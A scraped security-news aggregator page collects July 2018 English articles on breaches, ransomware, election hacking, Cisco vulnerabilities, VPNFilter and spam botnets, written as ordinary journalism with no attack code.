English Articles - Úvod  Odborné èlánky  Bleskovky  Témata  List  EN  CZ  Seriály  Blogy  ÈlánkyCZ

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.2018 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
In 2012 a British judge ruled WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the last years in its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week, this means that Assange will leave the embassy and British authorities will catch him.

“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly-elected President of Ecuador Lenín Moreno arrived in London on Friday, officially the motivation of his travel is the participation at the Global Disability Summit on 24 July 2018, but media reports suggest he was reaching an agreement with UK government to withdraw the asylum protection of Assange.

“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 2018 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald

· 20 Jul
The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …

Glenn Greenwald

Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

6:05 PM - Jul 20, 2018
590 people are talking about this
Twitter Ads info and privacy

Glenn Greenwald

· 20 Jul
Replying to @ggreenwald
Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

Glenn Greenwald

The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that.

8:37 PM - Jul 20, 2018
503 people are talking about this
Twitter Ads info and privacy
In May 2017, Swedish prosecutors dropped their preliminary investigation into an allegation of rape against Julian Assange, but the Wikileaks founder fears that he would be extradited to the US, where he is facing federal charges his role in the Chelsea Manning‘s case.

Julian Assange

Three months ago, Ecuador blocked Assange from accessing the internet, mainly to avoid that he could express support to Catalonia and its dispute with the Spanish Government for the independence.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

Which are current charges against Assange in the UK?

The only criminal proceeding against Assange is a pending 2012 arrest warrant for “failure to surrender” that is considered by experts a minor bail violation charge.

This charge carries a prison term of three months and a fine, though it is possible that the time Assange has already spent in prison in the UK could be counted against that sentence.

Microsoft uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates
20.7.2018 securityaffairs

Microsoft helped the US Government is protecting at least three 2018 midterm election candidates from attacks of Russian cyberspies.
Microsoft revealed that Russian cyberspies attempted to hack at least three 2018 midterm election candidates and it has helped the US government to repeal their attacks.

A Microsoft executive speaking at the Aspen Security Forum revealed the hacking attempts against at least three unnamed congressional candidates, all the attacks were detected this year,

The company executive only added that the three candidates were “people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint.”

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website it has taken down it and helped the US government to “avoid anybody being infected by that particular attack.”

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”

Microsoft APT28

Burt compared the recent activities with the hacking campaign conducted to interfere with the 2016 Presidential election, he pointed out that differently from 2016 campaigns, 2018 attacks do not target think tanks and academic experts that they did during the 2016 presidential election.

“That does not mean we’re not going to see it, there is a lot of time left before the election.” Burt added.

Thousands of Mega account credentials leaked online, it is credential stuffing
20.7.2018 securityaffairs Incindent

Thousands of account credentials associated with the popular file storage service Mega have been published online,
The former NSA hacker Patrick Wardle, co-founder at Digita Security, discovered in June a text file containing over 15,500 usernames, passwords, and files names.

patrick wardle

😢 Found file on VirusTotal w/ 15K+ Mega accounts (user names/passwords & users' file listings)

😥🤬 File listings included files names describing child abuse content

👮🏽‍♂️🚔🌍 International law enforcement actively engaged

🙏🏽 @zackwhittaker for writeup & collaboration! https://twitter.com/zackwhittaker/status/1018997928793464833 …

11:01 AM - Jul 18, 2018
32 people are talking about this
Twitter Ads info and privacy
The presence of the files suggests that the threat actors that collected them also accessed to each account and listed its content.

Wardle discovered the file after it was uploaded to the VirusTotal service some months earlier by a user purportedly in Vietnam.

Wardle passed the data to ZDNet that verified the huge trove of data belongs to the Mega service.

ZDNet contacted many users that confirmed the authenticity of the content of the file.

The data appears to date back to 2013, when Kim Dotcom launched the service.


ZDNet asked the popular expert Troy Hunt, who runs the data breach notification site Have I Been Pwned, to analyze the files.

Hunt believes the hackers collected the credentials from other data breaches (credential stuffing).

98 percent of the addresses in the file had already been included in a previous data breach and listed in the Hunt’ service.

“Some 87 percent of the accounts in the Mega file were found in a massive collection of 2,844 data breaches that he uploaded to the service in February, said Hunt.” read the post published by ZDNet.

“Of those we contacted, five said that they had used the same password on different sites.”

Mega chairman Stephen Hall also confirmed the file is the result of credential stuffing.

Experts noticed the Mega service doesn’t implement two-factor authentication -making it easy for attackers to access an account once it will obtain the credentials from other breaches.

Mega logs the IP address of each user who accesses to an account and some users confirmed to have noticed suspicious logins accessing their account from countries in Eastern Europe, Russia, and South America since the file was uploaded.

“One of the accounts in the file contained file listings for what appeared to describe child abuse content. Given the nature of the account’s content, ZDNet informed the authorities.” continues ZDNet.

The illegal content was uploaded years earlier, suggesting that the account owner has store excluding any recent third-party involvement.

“Mega has zero tolerance for child sexual abuse materials,” said Hall. “Any reports result in links being deactivated immediately, the user’s account closed and the details provided to the authorities.”

“Mega can’t act as censor by examining content as it is encrypted at the user’s device before being transferred to Mega,” he said. “As well as it being technically impossible, it is also practically infeasible for Mega and other major cloud storage providers, with 100s of files being uploaded each second.”

‘IT system issue’ caused cancellation of British Airways cancelled flights at Heathrow
20.7.2018 securityaffairs Security

British Airways canceled flights at Heathrow due to an ‘IT system issue,’ the incident occurred on Wednesday and affected thousands of passengers.
The problem had severe repercussions on the air traffic, many passengers also had their flights delayed.

“On one of the busiest days of the summer, British Airways cancelled dozens of flights to and from Heathrow, affecting at least 7,000 passengers

Problems began for BA when the control tower was closed for around 35 minutes on Wednesday afternoon when a fire alarm was triggered. Landings and take-offs were stopped.” reported the British Independent,

“Then an IT issue emerged which caused further disruption for BA and other airlines. Hundreds of flights were delayed, and some evening outbound departures were canceled. Around 3,000 British Airways passengers were stranded overnight abroad.”
The IT problem affected 7,000 passengers and more than 3,000 were forced to spend the night abroad attempting to fly back to London.

Officially the problem was originated by the IT supplier Amadeus that caused disruption to the flights, below the official statement of British Airways on its Twitter account. Reportedly, the British Airways passengers stranded at the airport were advised to ‘look for overnight accommodation or seek alternative travel arrangements’.

It seems that the IT problems affected also online-check in service of the company.

British Airways

“We are aware that British Airways is currently experiencing an issue which is impacting their ability to provide boarding passes to some passengers. We will be working with the airline to support their efforts to resolve the issue as quickly as possible.” stated a spokesperson for Heathrow.

The problems began a few hours after a fire alarm at Heathrow’s air traffic control tower was triggered causing delays for several airlines. According to the airport, this event is not related to the British Airways issue, while airline glitch has “impacted operation of the airfield for a short while”.

“The vast majority of customers affected by the supplier system issue and the temporary closure of Heathrow airport’s air traffic control tower are now on route to their destinations.”

“The supplier, Amadeus, resolved their system issue last night, and our schedule is now operating as normal.” said a spokesperson for British Airways.”

“We have apologised to our customers for disruption to their travel plans.”

British Airways experienced another technical problem at its IT systems in May 2017.

HR Services Firm ComplyRight Suffers Data Breach
20.7.2018 securityweek Incindent

Florida-based HR services provider ComplyRight revealed recently that its tax reporting platform was involved in a cybersecurity incident that resulted in the exposure of personal information.

ComplyRight learned on May 22 that someone had gained unauthorized access to its web-based tax reporting platform, which is used by various websites to prepare W-2, 1099 and other tax-related forms.

ComplyRight, which is owned by marketing company Taylor Corporation, provides tax solutions through efile4Biz. The efile4Biz website claims its services are used by 76,000 organizations.ComplyRight hacked

However, ComplyRight says the data breach has only impacted less than 10 percent of the individuals whose tax forms have been prepared on its platform.

ComplyRight hacked

An investigation conducted by the company showed that the attacker gained access to the names, addresses, phone numbers, email addresses, and Social Security numbers of individual tax form recipients. However, ComplyRight has not been able to determine whether the compromised information was actually downloaded by the unauthorized party, and says it has not seen any evidence of fraud as a direct result of the incident.

Affected individuals are being notified by mail and offered 12 months of free credit monitoring and identity theft protection services.

Security blogger Brian Krebs reported that some of the recipients of these letters were unaware of ComplyRight. The company clarified that its platform is used by various tax form preparation websites whose customers are impacted by the breach and many may not be familiar with the ComplyRight brand.

According to Krebs, the attackers had access to ComplyRight systems between April 20, 2018 and May 22, 2018.

“Upon learning of the issue, we disabled the platform, remediated the issue on the website, and commenced a prompt and thorough investigation using external cybersecurity professionals to determine who was potentially affected and what information was accessed or viewed,” ComplyRight stated. “Although the investigation determined the information was accessed and/or viewed, it could not confirm if the information was downloaded or otherwise acquired by an unauthorized user.”

ComplyRight is not the only HR services firm hit by a data breach recently. Australia-based PageUp reported last month that hackers may have gained access to names, contact information, usernames, and password hashes. PageUp says it has 2.6 million active users across over 190 countries.

Ransomware Attack Hits Health Firm LabCorp

20.7.2018 securityweek Ransomware

Burlington, North Carolina-based LabCorp took some of its systems offline last weekend after discovering that some had been infected by ransomware.

LabCorp, a company that provides “diagnostic, drug development and technology-enabled solutions for more than 115 million patient encounters per year,” serves hundreds of thousands of customers nationwide and processes tests on more than 2.5 million patient specimens per week.

With revenues that topped $10 billion last year, the health company operates a network of more than 1,900 patient service centers (PSCs) nationally and employs about 60,000 people.

In an 8-K filing with the U.S. Securities and Exchange Commission on Monday, the company revealed that, over the weekend of July 14, it detected suspicious activity on its network and decided to take some systems offline to contain the activity.

“The activity was subsequently determined to be a new variant of ransomware,” the health firm said, responding to a SecurityWeek inquiry on the attack.

“LabCorp promptly took certain systems offline as part of its comprehensive response to contain and remove the ransomware from its system. This has temporarily affected some test processing and customer access to test results,” the company said.

As of Monday, testing operations had been already resumed and the firm was working on bringing additional systems and functions online.

“Work has been ongoing to restore full system functionality as quickly as possible, testing operations have substantially resumed, and we are working to restore additional systems and functions over the next several days,” the company told SecurityWeek.

The ransomware, LabCorp says, only impacted its Diagnostics systems but did not affect Covance Drug Development systems. The health firm also revealed it has “engaged outside security experts and is working with authorities, including law enforcement.”

For the time being, the “investigation has found no evidence of theft or misuse of data,” the company said.

Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.2018 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has little real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russia state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the wide spread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our client's security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-Centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach ensure that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”

Robocalling Firm Exposes U.S. Voter Records
20.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and has been already indexed by searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files that included audio files with pre-recorded political messages for robocalls dials (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robcent also provides voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and files access after being responsibly alerted on the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years, there were numerous incidents involving voter databases, including one reported by Diachenko in December last year, where an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.

Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products
19.7.2018 securityaffairs

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.
The tech giant has reported customers four critical vulnerabilities affecting the Policy Suite.

The flaws tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377 have been discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

The access to the Policy Builder interface could allow an attacker to change to existing repositories and create new ones, while the access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

An unauthenticated attacker could also allow an attacker to modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”

Cisco also warned of the presence of the Cluster Manager in Policy Suite of a root account with default and static credentials. A remote attacker can exploit the vulnerabilities to access to the account and execute arbitrary commands with root privileges.

Cisco also warned of the presence of seven flaws in the SD-WAN solution, one of them affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

Cisco also reported a high severity DoS vulnerability that affects Nexus 9000 series Fabric switches, the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them has been exploited in attacks in the wild.

Timehop provides additional details on the recent security breach

19.7.2018 securityaffairs Incindent

Timehop has recently announced to have suffered a data breach that affected 21 million user accounts. The company now shares additional details about the incident.
Timehop service aims to help people in finding new ways to connect with each other by analyzing past activities, earlier this month, the company revealed that one or more malicious hackers gained unauthorized access to a database storing usernames, phone numbers, email addresses, and social media access tokens for all users.

The security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. The tokens have been quickly revoked and currently don’t work.

Wednesday the company provided an update on the incident adding that further info was exposed, including dates of birth, genders, and country codes.


“Earlier reports of “up to 21 million emails” were correct. However we now provide the following breakdown of Personally Identifiable Information (PII) that was breached, and the combinations contained in records” reads the update provided by the company.

Name, email, phone, DOB 3.3 million 174,000
Name, email address, phone 3.4 million 181,000
Name, email address, DOB 13.6 million 2.2 million
Name, phone number, DOB 3.6 million 189,000
Name and email address 18.6 million 2.9 million
Name and phone number 3.7 million 198,000
Name and DOB 14.8 million 2.5 million
Name total 20.4 million 3.8 million
DOB total 15.5 million 2.6 million
Email addresses total 18.6 million 2.9 million
Gender designation total 9.2 million 2.6 million
Phone numbers total 4.9 million 243,000
The company provided a detailed analysis of exposed info, specifically for the affected PII records in compliance with the introduced GDPR.

According to the company, hackers first breached into its systems on December 19, 2017, using an employee’s credentials for the company’s cloud computing environment.

The attackers accessed the systems through an IP address in the Netherlands.

In a first phase, the hacker conducted a reconnaissance, at the time the compromised environment had not stored any personal information. In early April, the company moved personal information to the compromised database and the attackers found it only on June 22.

On July 4, the hacker exfiltrated the data and changed its password. The activity was noticed by the company in nearly 24 hours.

“They did not immediately suspect a security incident for two reasons that in retrospect are learning moments,” reads the technical analysis published by Timehop. “First, because it was a holiday and no engineers were in the office, he considered it likely that another engineer had been doing maintenance and changed the password. Second, password anomalies of a similar nature had been observed in past outage. He made the decision that the event would be examined the next day, when engineers returned to the office.”

Facebook faces £500,000 fine in the U.K. over Cambridge Analytica scandal

19.7.2018 securityaffairs Social

Facebook has been fined £500,000 ($664,000) in the U.K. for its conduct in the Cambridge Analytica privacy scandal.
Facebook has been fined £500,000 in the U.K., the maximum fine allowed by the UK’s Data Protection Act 1998, for failing to protect users’ personal information.

Facebook- Cambridge Analytica

Political consultancy firm Cambridge Analytica improperly collected data of 87 million Facebook users and misused it.

“Today’s progress report gives details of some of the organisations and individuals under investigation, as well as enforcement actions so far.

This includes the ICO’s intention to fine Facebook a maximum £500,000 for two breaches of the Data Protection Act 1998.” reads the announcement published by the UK Information Commissioner’s Office.

“Facebook, with Cambridge Analytica, has been the focus of the investigation since February when evidence emerged that an app had been used to harvest the data of 50 million Facebook users across the world. This is now estimated at 87 million.

The ICO’s investigation concluded that Facebook contravened the law by failing to safeguard people’s information. It also found that the company failed to be transparent about how people’s data was harvested by others.”

This is the first possible financial punishment that Facebook is facing for the Cambridge Analytica scandal.

“A significant finding of the ICO investigation is the conclusion that Facebook has not been sufficiently transparent to enable users to understand how and why they might be targeted by a political party or campaign,” reads ICO’s report.

Obviously, the financial penalty is negligible compared to the gains of the giant of social networks, but it is a strong message to all the company that must properly manage users’ personal information in compliance with the new General Data Protection Regulation (GDPR).

What would have happened if the regulation had already been in force at the time of disclosure?

According to the GDPR, the penalties allowed under the new privacy regulation are much greater, fines could reach up to 4% of the global turnover, that in case of Facebook are estimated at $1.9 billion.

“Facebook has failed to provide the kind of protections they are required to under the Data Protection Act.” Elizabeth Denham, the UK’s Information Commissioner said. “People cannot have control over their own data if they don’t know or understand how it is being used. That’s why greater and genuine transparency about the use of data analytics is vital.”

Facebook still has a chance to respond to the ICO’s Notice of Intent before a final decision on the fine is made.

“In line with our approach, we have served Facebook with a Notice setting
out the detail of our areas of concern and invited their representations on
these and any action we propose. ” concludes the ICO update on the investigation published today by Information Commissioner Elizabeth Denham.

“Their representations are due later this month, and we have taken no final view on the merits of the case at this time. We will consider carefully any representations Facebook may wish to make before finalising our views,”

Ukraine ‘s SBU Security Service reportedly stopped VPNFilter attack at chlorine station
19.7.2018 securityaffairs CyberWar

Ukraine ‘s SBU Security Service reportedly stopped VPNFilter attack at chlorine station, the malware infected the network equipment in the facility that supplies water treatment and sewage plants.
According to the Interfax-Ukraine media outlet, the VPNFilter hit the LLC Aulska station in Auly (Dnipropetrovsk region), according to the experts the malware aimed at disrupting operations at the chlorine station.

“Specialists of the cyber security service established minutes after [the incident] that the enterprise’s process control system and system for detecting signs of emergencies had deliberately been infected by the VPNFilter computer virus originating from Russia. The continuation of the cyber attack could have led to a breakdown in technological processes and a possible accident,” the SBU said on its Facebook page on Wednesday.

VPNFilter is a multi-stage, modular strain of malware that has a wide range of capabilities for both cyber espionage and sabotage purpose.

According to the experts at Fortinet that analyzed the malware, VPNFilter operates in the following three stages:

Stage 1 implements a persistence mechanism and redundancy; it allows the malware to survive a reboot.
Stage 2 includes data exfiltration, command execution, file collection, and device management. Only in some versions it is present a self-destruct module.
Stage 3 includes multiple modules that perform different tasks. At the time researchers identified only three modules:
A packet sniffer for traffic analysis and potential data exfiltration.
The monitoring of MODBUS SCADA protocols.
Communication with obfuscated addresses via TOR
The main concerns are for a self-destruct mode that could cause severe damages across all infected devices simultaneously, a feature that could potentially result in widespread Internet outage over a targeted geographic region.

Technical analysis of the code revealed many similarities with another nation-state malware, the BlackEnergy malware that was specifically designed to target ISC-SCADA systems and attributed to Russian threat actors.

Another similarity is the geographic distribution of the infections, both BlackEnergy and VPNFilter infected a large number of devices in Ukraine.

VPNFilter malware

According to the experts, many infected devices have been discovered in Ukraine, and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, most infections in Ukraine and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware had infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

At the time of first discovery, the US Justice Department seized a domain used as part of the command and control infrastructure, its press release explicitly referred the Russian APT groups (APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group) as the operators behind the huge botnet,

“The Justice Department today announced an effort to disrupt a global botnet of hundreds of thousands of infected home and office (SOHO) routers and other networked devices under the control of a group of actors known as the “Sofacy Group” (also known as “apt28,” “sandworm,” “x-agent,” “pawn storm,” “fancy bear” and “sednit”),” reads the press release published by the DoJ.

“The SBU said its agents together with a telecoms provider and workers of the station managed to prevent a potential man-made disaster, adding Russia special forces were behind cyber attacks with the same virus on the public and private sectors in May 2018.” concluded the Interfax-Ukraine.

Spambot aims at targets WordPress sites in World Cup-Themed spam scam
19.7.2018 securityaffairs

Imperva observed a spambot targeting WordPress sites aimed at tricking victims into clicking on links to sites offering betting services on FIFA World Cup
Security experts from Imperva recently observed a spike in spam activity directed at WordPress websites, attackers aimed at tricking victims into clicking on links to sites offering betting services on the 2018 FIFA World Cup games.
Imperva monitored the activity of a botnet used to spread meaningless text messages generated from a template to comments sections in blogs, news articles, and other web sites that allow people to comment.

“Turns out the attack was launched by a botnet and implemented in the form of comment SPAM – meaningless, generic text generated from a template and posted in the comment sections of blogs, news articles etc; linking to pay-per-click commercial or suspicious sites looking to scam you or phish for your passwords.” reads the report published Imperva.

The spambot was used to post comments to the same Uniform Resource Identifier (URI) across different WordPress sites indiscriminately and without regard for whether the site is has a comments section or is affected by exploitable known issues.

The comments are generated starting from this template that is known since at least 2013. The template allows to automatically create slightly different versions of the same message to use in spam campaigns.

“Our analysis found that the top 10 links advertised by the botnet lead to World Cup betting sites. Interestingly, eight of the top advertised sites contained links to the same betting site, hinting that they might be connected in a way.” continues Imperva.

World Cup betting sites

“We found that the botnet advertised over 1000 unique URLs, most of them appear multiple times. In many cases, the botnet used different techniques such as URL redirection and URL-shortening services to mask the true destination of the advertised link.”

According to the experts, the spambot is still small, it is composed of just 1,200 unique IPs with up to 700 daily unique IPs. The experts discovered that botnet has also been using URL-shortening, URL redirection, and other techniques to masquerade the landing sites of advertised links in its spam messages.

In the weeks before the World Cup, the spambot was being used in remote code execution attacks and other non-SPAM attacks on WordPress sites

Spambot World Cup

Just after the beginning of the 2018 World Cup, the botnet activity was focused on comment spam, a circumstance that suggests the malicious infrastructure is available for hire.

“A possible explanation is that the botnet is for hire. The malicious activity we’ve seen at first was either paid for or simply the botnet’s attempt to grow itself. Then, it was hired by these betting sites to advertise them and increase their SEO.” continues the analysis.

Comment spam is a well-known activity in the threat landscape, the most common countermeasure it to blacklist IPs originating spams messages and also the URLs that they advertise.

WordPress also has several Plug-ins that cuold defeat this boring activity.

“Although comment SPAM has been with us for more than a decade — and doesn’t seem like it’s going away anytime soon — there are numerous solutions ranging from dedicated plugins that block comments that look SPAMmy, to WAF services.” concluded Imperva.

Mobile Malware Campaign targets users in India through rogue MDM service
19.7.2018 securityaffairs

Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware distributed through a bogus MDM service
Security experts from Talos Team have uncovered a “highly targeted” campaign leveraging a mobile malware that has been active at least since August 2015. The researchers believe that cyberspies are operating from China and they found spying on 13 selected iPhones in the same country.

Attackers were abusing a mobile device management (MDM) service that normally allows large enterprises to control devices being used by the employees and enforce policies.

